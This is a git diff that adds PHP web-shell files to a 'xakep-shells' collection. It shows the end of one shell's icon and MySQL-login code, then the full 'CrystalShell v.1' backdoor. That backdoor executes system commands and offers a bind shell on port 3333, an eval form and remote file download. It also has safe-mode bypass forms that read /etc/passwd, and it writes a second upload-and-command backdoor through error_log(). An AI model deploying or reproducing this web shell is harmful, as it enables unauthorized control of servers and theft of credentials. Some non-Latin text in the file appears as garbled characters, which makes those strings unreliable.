+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $d�ta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+
+<html>
+<head>
+</head>
+<body>
+<center> <br><br>
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+	<col width=1>
+	<col width=600>
+	<col width=1>
+	<tr> <td></td>
+		 <td align=left class=texte>
+		 <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'>
+		   <table border=0 align=center>
+		   <col>
+		   <col align=left>
+		   <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
+		   ������� ������ ��� ����������� � mySQL �������!<br><br>
+		   		</td>
+		   </tr>
+		   <tr> <td class=texte>����� �������:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>�������� ����:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>�����:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>������</td>
+		   		<td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+		   </tr>
+		   </table>
+		   <br> <center> <br><br>
+		   <input type='submit' value=' ����������� ' class=form></center> </form> <br><br>
+		   </td>
+		   		<td></td>
+			</tr>
+			<tr> <td height=1 colspan=3></td>
+		  </tr>
+		  </table> </center>
+		  </body>
+		  </html>
+
diff --git a/xakep-shells/PHP/crystal.txt b/xakep-shells/PHP/crystal.txt
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/xakep-shells/PHP/crystal.txt
@@ -0,0 +1,1127 @@
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+<style type='text/css'> body {	background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
+SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
+{background-color:   #FFFFFF   !important}  input  {background-color:   #303030
+!important} option {  background-color:   #303030   !important}         textarea
+{background-color: #303030 !important} input {color: #1CB081 !important}  option
+{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
+{background-color: #303030 !important} select {font-weight: normal;       color:
+#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
+background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
+0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
+!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
+!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
+!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
+normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
+{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
+color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-weight:bold; font-style: italic;}-->
+  </style>
+  <![endif]-->
+<meta http-equiv=Content-Language content=ar>
+<!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+ <style>
+<!--
+body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
+-->
+</style>
+<style> 
+<!-- 
+#leftright, #topdown{ 
+position:absolute; 
+left:0; 
+top:0; 
+width:1px; 
+height:1px; 
+layer-background-color:limegreen; 
+background-color:red; 
+z-index:100; 
+font-size:1px; 
+} 
+--> 
+</style>
+
+</head>
+  </head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">�</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
+&nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="5" color="#C0C0C0">�</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
+</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="������� ���Php" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2">&nbsp;</font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="�������" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><b><font size="4px">
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font></font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="�������" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font></font><span lang="en-us"><font face="verdana" color="white">
+	<a href="?act=bypass"><font color=#CC0000 size="3">
+<a title="����� ������" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font><font face="verdana" color="white"><span lang="en-us">
+<a title="������� ������ ��������" href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0">�</font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0">�</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
+	</font></b></font><b><font face="verdana" color="white">
+	</b><b>
+	<a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
+<a title="��������" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="��������" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="�������" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
+</font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+	<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size=-2 face=verdana color=#CC0000>server </font>
+	<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+	</font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
+<font size=-2 face=verdana color=white>
+	<font size="4px" face="verdana" color="white">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font face=Verdana size=-2 color="#008000">
+	CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
+	<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
+</font>
+	</b>
+</font></a>&nbsp;&nbsp;<br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+	<font face=Verdana size=-2 color="#CC0000">
+	<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+	<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+	</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+	</font>
+	</a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+</font></font>
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+	</font>
+	<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+	</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+	</font></font>
+	</font>
+	</font>
+	</b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>������ ����� ����� ���� �������<br><br>����� ��������<br>��� ���� �������� ���� ��� ��� ������ ������ ������ ������<br>������ �� ������� ������   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+ echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect �� ������ ��� ����.<br>.- ��� ����� ����� �������� �������<br>.-���� ����� ���� ��� ����� ���<br>nc -lp 3333������ ������ - <br>�������� ���� ������ <br>Bind port to  :<br> bind shell ������ � ��   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>������� ������� �������  Select ------ x  ���� ��� ������<br>.- ���� ���� �����  ������� ����� �� ����� �������<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+	<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+	<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+	<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+	&nbsp;</p>
+	<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+		<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+			<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * Super-Crystal  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+   }
+
+
+?>
